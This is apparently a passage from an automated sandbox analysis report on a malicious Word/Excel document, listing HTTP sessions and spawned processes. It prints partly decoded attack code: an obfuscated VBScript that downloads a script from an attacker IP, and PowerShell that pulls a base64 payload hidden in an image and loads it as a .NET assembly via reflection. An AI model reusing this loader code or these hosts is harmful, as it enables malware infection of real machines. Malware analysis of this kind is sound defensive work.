        Data Raw: 32 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 20 66 6f 6e 74 3a 20 31 36 70 78 2f 31 2e 35 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
        Data Ascii: 276<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="robots" content="noindex,nofollow" /> <style> body { background-color: #fff; color: #222; font: 16px/1.5 -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; margin: 0; } .container { margin: 30px; max-width: 600px; } h1 { color: #dc3545; font-size: 24px; }</style> </head> <body> <div class="container"> <h1>Whoops, looks like something went wrong.</h1> </div> </body></html>0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        7192.168.2.2249170192.185.89.92801432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampBytes transferredDirectionData
        Jul 3, 2024 17:58:52.608647108 CEST132OUTHEAD /sWel7 HTTP/1.1
        User-Agent: Microsoft Office Existence Discovery
        Host: hop.fyi
        Content-Length: 0
        Connection: Keep-Alive
        Jul 3, 2024 17:58:53.151038885 CEST362INHTTP/1.1 301 Moved Permanently
        Date: Wed, 03 Jul 2024 15:58:53 GMT
        Server: Apache
        Cache-Control: no-cache, no-store, private
        Expires: -1
        Upgrade: h2,h2c
        Connection: Upgrade, Keep-Alive
        Location: http://198.46.178.139/33144/ee/uh.uh.uhuhuh.uu.uh.doc
        Access-Control-Allow-Origin: *
        Keep-Alive: timeout=5, max=75
        Content-Type: text/html; charset=UTF-8


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        8192.168.2.2249171198.46.178.139801432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampBytes transferredDirectionData
        Jul 3, 2024 17:58:53.160409927 CEST165OUTHEAD /33144/ee/uh.uh.uhuhuh.uu.uh.doc HTTP/1.1
        User-Agent: Microsoft Office Existence Discovery
        Host: 198.46.178.139
        Content-Length: 0
        Connection: Keep-Alive
        Jul 3, 2024 17:58:53.652770042 CEST323INHTTP/1.1 200 OK
        Date: Wed, 03 Jul 2024 15:58:53 GMT
        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
        Last-Modified: Wed, 03 Jul 2024 02:04:37 GMT
        ETag: "2d160-61c4e40a2a928"
        Accept-Ranges: bytes
        Content-Length: 184672
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/msword


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        9192.168.2.2249172198.46.178.139803276C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        TimestampBytes transferredDirectionData
        Jul 3, 2024 17:58:54.191720963 CEST349OUTGET /33144/creatingfollowerswithflowereseverytime.gif HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 198.46.178.139
        Connection: Keep-Alive
        Jul 3, 2024 17:58:54.695733070 CEST1236INHTTP/1.1 200 OK
        Date: Wed, 03 Jul 2024 15:58:54 GMT
        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
        Last-Modified: Wed, 03 Jul 2024 02:01:02 GMT
        ETag: "da2-61c4e33cdcdf9"
        Accept-Ranges: bytes
        Content-Length: 3490
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: image/gif
        Data Raw: ff fe 44 00 69 00 6d 00 20 00 4e 00 42 00 57 00 69 00 7a 00 69 00 4b 00 4c 00 4c 00 70 00 64 00 47 00 4e 00 57 00 4b 00 68 00 4e 00 63 00 68 00 57 00 55 00 69 00 6c 00 57 00 47 00 57 00 4a 00 4b 00 41 00 43 00 6d 00 67 00 5a 00 66 00 41 00 6c 00 63 00 65 00 6c 00 47 00 4b 00 43 00 69 00 55 00 6e 00 69 00 6e 00 4b 00 6f 00 65 00 62 00 6f 00 63 00 4b 00 4c 00 55 00 64 00 47 00 69 00 4f 00 74 00 68 00 57 00 42 00 6b 00 69 00 70 00 6b 00 4e 00 68 00 4b 00 75 00 4e 00 47 00 63 00 4c 00 70 00 74 00 63 00 52 00 7a 00 52 00 68 00 57 00 6d 00 69 00 52 00 4e 00 4f 00 41 00 6f 00 66 00 4c 00 50 00 49 00 4c 00 71 00 4c 00 4e 00 43 00 2c 00 20 00 61 00 4c 00 68 00 57 00 75 00 4c 00 5a 00 70 00 70 00 42 00 74 00 57 00 4a 00 70 00 4c 00 69 00 61 00 6d 00 6c 00 64 00 4c 00 6b 00 4b 00 68 00 6f 00 62 00 74 00 4c 00 51 00 65 00 4b 00 6d 00 71 00 54 00 6c 00 63 00 4b 00 6f 00 62 00 67 00 74 00 66 00 67 00 6f 00 4e 00 66 00 78 00 57 00 4a 00 57 00 68 00 78 00 5a 00 4e 00 63 00 68 00 64 00 51 00 69 00 7a 00 6a 00 75 00 [TRUNCATED]
        Data Ascii: Dim NBWiziKLLpdGNWKhNchWUilWGWJKACmgZfAlcelGKCiUninKoebocKLUdGiOthWBkipkNhKuNGcLptcRzRhWmiRNOAofLPILqLNC, aLhWuLZppBtWJpLiamldLkKhobtLQeKmqTlcKobgtfgoNfxWJWhxZNchdQizjupROAsaTiqulKqfGOdiAKuZfHLkemRKLBiKKiKLSet NBWiziKLLpdGNWKhNchWUilWGWJKACmgZfAlcelGKCiUninKoebocKLUdGiOthWBkipkNhKuNGcLptcRzRhWmiRNOAofLPILqLNC = CreateObject("MSXML2.ServerXMLHTTP")NBWiziKLLpdGNWKhNchWUilWGWJKACmgZfAlcelGKCiUninKoebocKLUdGiOthWBkipkNhKuNGcLptcRzRhWmiRNOAofLPILqLNC.Open "GE
        Jul 3, 2024 17:58:54.695772886 CEST1236INData Raw: 54 00 22 00 2c 00 20 00 22 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 39 00 31 00 2e 00 39 00 32 00 2e 00 32 00 35 00 34 00 2e 00 32 00 39 00 2f 00 55 00 73 00 65 00 72 00 73 00 5f 00 41 00 50 00 49 00 2f 00 73 00 79 00 73 00 63 00 6f 00 72 00
        Data Ascii: T", "http://91.92.254.29/Users_API/syscore/file_ygeik543.xh0.txt", FalseNBWiziKLLpdGNWKhNchWUilWGWJKACmgZfAlcelGKCiUninK
        Jul 3, 2024 17:58:54.695785046 CEST1236INData Raw: 69 00 63 00 6b 00 63 00 63 00 4e 00 47 00 6f 00 74 00 4e 00 69 00 52 00 66 00 7a 00 4b 00 57 00 0d 00 0a 00 20 00 20 00 20 00 20 00 53 00 65 00 74 00 20 00 55 00 6b 00 4c 00 7a 00 5a 00 57 00 57 00 63 00 4c 00 4f 00 50 00 69 00 4e 00 51 00 55 00
        Data Ascii: ickccNGotNiRfzKW Set UkLzZWWcLOPiNQUWUspWKGtimiKKceoNCuAWeLJuPLcNbNekWuLjHWoWWLbrKCWeWWNeGAifAnjLuhaaiZtUickccNGotNiR
        Jul 3, 2024 17:58:54.695909977 CEST92INData Raw: 70 00 6b 00 4e 00 68 00 4b 00 75 00 4e 00 47 00 63 00 4c 00 70 00 74 00 63 00 52 00 7a 00 52 00 68 00 57 00 6d 00 69 00 52 00 4e 00 4f 00 41 00 6f 00 66 00 4c 00 50 00 49 00 4c 00 71 00 4c 00 4e 00 43 00 20 00 3d 00 20 00 4e 00 6f 00 74 00 68 00
        Data Ascii: pkNhKuNGcLptcRzRhWmiRNOAofLPILqLNC = Nothing


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        10192.168.2.224917391.92.254.29803352C:\Windows\SysWOW64\wscript.exe
        TimestampBytes transferredDirectionData
        Jul 3, 2024 17:58:55.692065001 CEST209OUTGET /Users_API/syscore/file_ygeik543.xh0.txt HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Language: en-US
        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
        Host: 91.92.254.29
        Jul 3, 2024 17:58:56.323698997 CEST1236INHTTP/1.1 200 OK
        Date: Wed, 03 Jul 2024 15:58:56 GMT
        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
        Last-Modified: Wed, 03 Jul 2024 02:01:02 GMT
        ETag: "57c-61c4e33d1aeb8"
        Accept-Ranges: bytes
        Content-Length: 1404
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: text/plain
        Data Raw: ef bb bf 28 27 53 65 56 6c 69 6e 6b 20 3d 20 38 5a 4b 68 74 74 70 73 3a 2f 2f 75 70 6c 6f 61 64 64 65 69 6d 61 67 65 6e 73 2e 63 6f 6d 2e 62 72 2f 69 27 2b 27 6d 61 67 65 73 2f 30 30 34 2f 38 30 37 2f 30 35 33 2f 6f 72 69 67 69 6e 61 6c 2f 6e 65 77 5f 69 27 2b 27 6d 61 67 65 2e 6a 70 67 3f 31 37 31 39 38 34 27 2b 27 36 32 33 35 38 5a 4b 3b 20 53 65 56 77 65 62 43 6c 69 65 6e 74 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 3b 20 74 72 79 20 7b 20 53 65 56 64 6f 77 6e 6c 6f 61 64 65 64 44 61 74 61 20 3d 20 53 65 56 77 65 62 43 6c 69 65 6e 74 2e 44 6f 77 6e 6c 6f 61 64 44 61 74 61 28 53 65 56 6c 69 6e 6b 29 20 7d 20 63 61 74 63 68 20 7b 20 57 72 69 74 65 2d 48 6f 73 74 20 38 5a 4b 46 61 69 6c 65 64 20 54 6f 20 64 6f 77 6e 6c 6f 61 64 20 64 61 74 61 20 66 72 6f 6d 20 53 65 56 27 2b 27 6c 69 6e 6b 27 2b 27 38 5a 4b 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 52 65 64 3b 20 65 78 69 74 20 7d 3b 20 69 27 2b 27 66 27 2b 27 20 28 53 65 56 64 [TRUNCATED]
        Data Ascii: ('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVba
        Jul 3, 2024 17:58:56.323724031 CEST479INData Raw: 73 65 36 34 43 6f 6d 6d 61 6e 64 29 3b 20 53 65 56 6c 6f 61 64 65 64 41 73 73 65 6d 62 6c 79 20 3d 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 27 2b 27 73 73 65 6d 62 6c 79 5d 3a 3a 4c 6f 61 64 28 53 65 56 63 6f 6d 6d 61 6e 64
        Data Ascii: se64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133


        Session IDSource IPSource PortDestination IPDestination Port
        11192.168.2.2249175192.185.89.9280
        TimestampBytes transferredDirectionData
        Jul 3, 2024 17:59:00.016228914 CEST154OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69
        Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: hop.fyi
        Jul 3, 2024 17:59:00.577826023 CEST986INHTTP/1.1 405 Method Not Allowed
        Date: Wed, 03 Jul 2024 15:59:00 GMT
        Server: Apache
        allow: GET, HEAD
        Cache-Control: no-cache, private
        Upgrade: h2,h2c
        Connection: Upgrade, Keep-Alive
        Vary: Accept-Encoding
        Access-Control-Allow-Origin: *
        Keep-Alive: timeout=5, max=75
        Transfer-Encoding: chunked
        Content-Type: text/html; charset=UTF-8
        Data Raw: 32 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 20 66 6f 6e 74 3a 20 31 36 70 78 2f 31 2e 35 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
        Data Ascii: 276<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="robots" content="noindex,nofollow" /> <style> body { background-color: #fff; color: #222; font: 16px/1.5 -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; margin: 0; } .container { margin: 30px; max-width: 600px; } h1 { color: #dc3545; font-size: 24px; }</style> </head> <body> <div class="container"> <h1>Whoops, looks like something went wrong.</h1> </div> </body></html>0


        Session IDSource IPSource PortDestination IPDestination Port
        12192.168.2.2249176192.185.89.9280
        TimestampBytes transferredDirectionData
        Jul 3, 2024 17:59:00.881969929 CEST154OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69
        Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: hop.fyi
        Jul 3, 2024 17:59:01.420353889 CEST986INHTTP/1.1 405 Method Not Allowed
        Date: Wed, 03 Jul 2024 15:59:01 GMT
        Server: Apache
        allow: GET, HEAD
        Cache-Control: no-cache, private
        Upgrade: h2,h2c
        Connection: Upgrade, Keep-Alive
        Vary: Accept-Encoding
        Access-Control-Allow-Origin: *
        Keep-Alive: timeout=5, max=75
        Transfer-Encoding: chunked
        Content-Type: text/html; charset=UTF-8
        Data Raw: 32 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 20 66 6f 6e 74 3a 20 31 36 70 78 2f 31 2e 35 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
        Data Ascii: 276<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="robots" content="noindex,nofollow" /> <style> body { background-color: #fff; color: #222; font: 16px/1.5 -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; margin: 0; } .container { margin: 30px; max-width: 600px; } h1 { color: #dc3545; font-size: 24px; }</style> </head> <body> <div class="container"> <h1>Whoops, looks like something went wrong.</h1> </div> </body></html>0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.2249174188.114.96.34433440C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        TimestampBytes transferredDirectionData
        2024-07-03 15:59:00 UTC124OUTGET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1
        Host: uploaddeimagens.com.br
        Connection: Keep-Alive
        2024-07-03 15:59:00 UTC591INHTTP/1.1 200 OK
        Date: Wed, 03 Jul 2024 15:59:00 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        X-Frame-Options: SAMEORIGIN
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2B6AlZKUbAawK21oSlQqTLRrHeoBcBYXNRWlKn%2BitAZIWn51BoWrV955vbY5kuOjn3BII6NWBbicsc3jb8rynPr%2FcpPET%2F0fj3hIm1rmSmyYsUWO6%2F%2Bke0nNikyay0McMBlz%2BMZF6E6j"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 89d8148d8d537ced-EWR
        alt-svc: h3=":443"; ma=86400
        2024-07-03 15:59:00 UTC778INData Raw: 31 31 35 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 115e<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2024-07-03 15:59:00 UTC1369INData Raw: 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20
        Data Ascii: cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var
        2024-07-03 15:59:00 UTC1369INData Raw: 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 66 57 32 6d 59 6e 74 64 4a 57 48 45 4c 5a 31 61 62 36 4d 4d 49 77 33 47 77 2e 59 4f 6f 42 51 79 62 50 45 66 6b 6e 53 75 68 54 38 2d 31 37 32 30 30 32 32 33 34 30 2d 30 2e 30 2e 31 2e 31 2d 2f 69 6d 61 67 65 73 2f 30 30 34 2f 38 30 37 2f 30 35 33 2f 6f 72 69 67 69 6e 61 6c 2f 6e 65 77 5f 69 6d 61 67 65 2e 6a 70 67 3f 31 37 31 39 38 34 36 32 33 35 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22
        Data Ascii: method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="fW2mYntdJWHELZ1ab6MMIw3Gw.YOoBQybPEfknSuhT8-1720022340-0.0.1.1-/images/004/807/053/original/new_image.jpg?1719846235"> <a href="
        2024-07-03 15:59:00 UTC938INData Raw: 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74
        Data Ascii: ss="hidden" id="cf-footer-ip">8.46.123.33</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="ht
        2024-07-03 15:59:00 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:11:58:21
        Start date:03/07/2024
        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
        Imagebase:0x13f5b0000
        File size:28'253'536 bytes
        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:3
        Start time:11:58:42
        Start date:03/07/2024
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
        Imagebase:0x13fa80000
        File size:1'423'704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:9
        Start time:11:58:53
        Start date:03/07/2024
        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        Wow64 process (32bit):true
        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        Imagebase:0x400000
        File size:543'304 bytes
        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:10
        Start time:11:58:54
        Start date:03/07/2024
        Path:C:\Windows\SysWOW64\wscript.exe
        Wow64 process (32bit):true
        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS"
        Imagebase:0xb50000
        File size:141'824 bytes
        MD5 hash:979D74799EA6C8B8167869A68DF5204A
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:12
        Start time:11:58:56
        Start date:03/07/2024
        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):true
